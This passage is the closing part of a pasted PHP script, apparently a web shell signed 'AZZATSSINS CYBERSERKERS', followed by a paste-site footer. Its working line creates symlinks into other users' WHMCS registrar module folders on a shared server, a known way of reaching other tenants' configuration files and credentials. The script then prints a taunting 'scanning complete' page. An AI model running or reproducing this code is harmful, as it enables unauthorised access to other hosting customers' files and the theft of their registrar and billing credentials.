  3550. @symlink('/'.$home.'/'.$user.'/public_html/WHMCS/modules/registrars/',$user.' <~ WHMCS-57');
  3551. }
  3552. echo '<hr color="#00bfff"><center>
  3553. <font face="Audiowide" size="5" style="color:#00bfff;background-color:#000000">
  3554. <img src="http://www.komunitas.for-indonesia.com/images/smiley/piss.gif"><br/>
  3555. Scanning Complete....<br/>
  3556. Now Checking Folder Result....<br/><br/><br/>
  3557. <a href="/WHMCS">O=[ GO TO HELL ]=O</a>
  3558. </font>
  3559. <br/><br/><br/></center> </body></html> ';
  3560. }
  3561. }
  3562.  
  3563.  
  3564. echo'<br><br>
  3565. <div style="background:blue;margin:0px;padding:8px;text-align:center;color:black;">
  3566. <font color=silver>&copy; </font><b><i>AZZATSSINS CYBERSERKERS</i></b>
  3567. </div>';
  3568. ?>
Add Comment
Please, Sign In to add comment